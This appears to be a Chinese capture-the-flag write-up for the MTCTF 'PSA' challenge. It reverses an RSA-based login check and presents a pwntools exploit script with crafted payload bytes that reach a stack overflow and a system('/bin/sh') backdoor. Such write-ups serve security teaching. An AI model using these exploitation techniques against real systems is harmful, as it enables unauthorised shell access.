MTCTF-PSA-Writeup

Original vagr4nt 看雪学苑 2022-07-01

本文为看雪论坛优秀文章
看雪论坛作者ID：vagr4nt

PSA这道题当时归到PWN类型下，到比赛截止是2sol。但其实这道题主要问题还是在它的逆向部分。

解题过程

IDA打开看到给了一个很像是登录的逻辑判断：

如果用户名和密码对了就给你进到栈溢出函数vuln()：

int vuln(){ __int64 buf; // [rsp+0h] [rbp-10h] __int64 v2; // [rsp+8h] [rbp-8h] buf = 0LL; v2 = 0LL; printf("You can set message: ", 0LL, 0LL); read(0, &buf, 0x1AuLL); return printf("OK, recv!", &buf);}

进入到先前的函数，可以看到题目进行了很多大数库操作，包括执行了bn_mod_exp之类的函数，基本上就可以判定是RSA，下面的代码我略修改过，所以基本上容易看清。

signed __int64 __fastcall public_block_operation(__int64 a1, unsigned int *a2, __int64 a3, unsigned int a4, _DWORD *a5){ _DWORD *v6; // [rsp+8h] [rbp-468h] char v7; // [rsp+30h] [rbp-440h] char m; // [rsp+140h] [rbp-330h] char e; // [rsp+250h] [rbp-220h] char c; // [rsp+360h] [rbp-110h] unsigned int edigits; // [rsp+468h] [rbp-8h] unsigned int ndigits; // [rsp+46Ch] [rbp-4h] v6 = a5; bn_decode((__int64)&m, 65u, a3, a4); bn_decode((__int64)&v7, 0x41u, (__int64)(v6 + 1), 256); bn_decode((__int64)&e, 0x41u, (__int64)(v6 + 65), 256); ndigits = bn_digits((__int64)&v7, 65); edigits = bn_digits((__int64)&e, 65); if ( (signed int)bn_cmp((__int64)&m, (__int64)&v7, ndigits) >= 0 ) return 4097LL; bn_mod_exp((__int64)&c, (__int64)&m, (__int64)&e, edigits, (__int64)&v7, ndigits); *a2 = (unsigned int)(*v6 + 7) >> 3; bn_encode(a1, *a2, (__int64)&c, ndigits); memset(&c, 0, 0x104uLL); memset(&m, 0, 0x104uLL); return 0LL;}

那么接下的核心问题是确定公钥N和e：

注意到这里的e是用十六进制去存储的，也就是{0x01, 0x00, 0x01}，即65537。N是小端序存储的，即0xdbea。

回到核心判断逻辑：

puts("Login\nPlease input your name:"); v13 = read(0, buf, 0x100uLL); public_block_operation((__int64)v11, (unsigned int *)&v10, (__int64)buf, v13, &pk); for ( i = 0; i <= 255 && !v11[i]; ++i ) ; v0 = &v11[i]; v1 = v0[1]; *(_QWORD *)s2 = *v0; v9 = v1; puts("Please input your password:"); memset(buf, 0, 0x100uLL); v13 = read(0, buf, 0x100uLL); public_block_operation((__int64)v11, (unsigned int *)&v10, (__int64)buf, v13, &pk); for ( i = 0; i <= 255 && !v11[i]; ++i ) ; v2 = &v11[i]; v3 = v2[1]; *(_QWORD *)s = *v2; v7 = v3; if ( strcmp("root", s2) ) goto LABEL_22; if ( strlen(s) != 6 ) goto LABEL_22; i = 0; while ( i <= 5 ) { v4 = i++; asc_2040A3[v4] ^= 0x11u; } if ( !strcmp(asc_2040A3, s) ) { puts("Welcome back, administrator. "); result = vuln(); }

以用户名为例，读入用户名后经过public_block_operation的一轮RSA加密，结果存放在v11中。然后v11首先去除掉首部的空字节，然后以Qword形式存放到s中。

说穿了就是截取加密后密文的前8个字节，然后去和'root'作比较。这里可以用GDB简单调试验证下：

我输入的username是'aaa\n'，跟进来在strcmp之前rsi的值与RSA加密结果的前几位一致。

下面那个password处理和这个同理，只不过加了一个简单异或，就不再赘述。

那么问题的核心就在于找到一个明文字符串，用公钥加密后的前几个字节必须是root。

那么直接用\x00填充构建一个8字节的密文'root\x00\x00\x00\x00'，然后反推明文，这个就是解RSA或模方程的问题了，不难，此题公钥N可以容易地被分解，password部分是同理的。

最后是栈溢出部分，题目还给了一个backdoor，里面是system('/bin/sh')，只要覆盖返回地址为backdoor地址就行了，但是我记得这题开了随机地址+覆盖字节数限制，只有一定的概率能覆盖成功。

exp如下即可进入栈溢出函数：

from pwn import *rs = process('./rsa')rs.sendline('2')rs.recvuntil('your name:\n')

fuck="TNH\x8b\x96\xca\xed\x02\xbdpb\xecv\xc2_\x87\x91\x8cFU\xf1^\xd7L3\xc4X\xcd1E\xc7d\xa7\xcb\x83\x08\xec\x1eQ\xfe;\xe5\xd1K\xf5\xa0\x06\xdc\x1a@Ux8\xe2kE[\xe9exn\x06\xe2\xd2\xadr\xcc\x99\x14n\xb0,\xe8\x95//\x0ca\\\n[\x9e4O\xde\x9b>\x9a\xedLf\xa0'a\x8b\xc7wW0\x85\n\xa4C\x94o\xab\xb4K\xfcDv\x96f5]c\x97\xd9`\x00\xbe\xc4R\x19\xd9Q\xeb<"

rs.send(fuck)

fuck2='\x80\xc7\x1e\xc6\xfe\x92\xee\xcb\xef2\xe3\xdf\xc2\xc2\x8a\xb0\xa6\xda\x8b\xbb\xddW\xbd9[\x97\xa9\xeeb\x9f\xba\xbe]\xa3\xd21(@\x04\x01\x9eg\\j\x89\xf2\xc6\xd2\x87\xd5\xeb\x8e\xbf\xcc\x00\xc0q\x89\x19?\xcf\xfcU\xfeq-{\xb6\xb9\xaf\xe8\xb6e\xcb\xb9\x12\x13.h\xce@\xd2\xcef\xff\xd8\xd2\xa5\xc4^\x8eKB\xee\xf5Q\x17X\xb60\xcd\xaa>7\x1f\x82S\xb9F Hg\xf5\xde\xb0r*\xda\x9a\xaa\x99M`\xe8,\xa0d\xb2'

rs.recvuntil('your password:\n')rs.send(fuck2)rs.interactive()

栈溢出以后getshell，当时的老图贴上来：

看雪ID：vagr4nt

https://bbs.pediy.com/user-home-904020.htm

*本文由看雪论坛 vagr4nt 原创，转载请注明来自看雪社区

# 往期推荐

1. 【分析记录】疑似Confucius组织组件CuoliVXaRAT分析

2. WOW怀旧服明文发包获取和HOOK

3. X86内核笔记_2_驱动开发

4. 新的漏洞分析体验：CVE-2010-3333 RTF栈缓冲区溢出漏洞

5. 某鹅安全竞赛20年初赛ring0题解

6. 某知笔记服务端docker镜像授权分析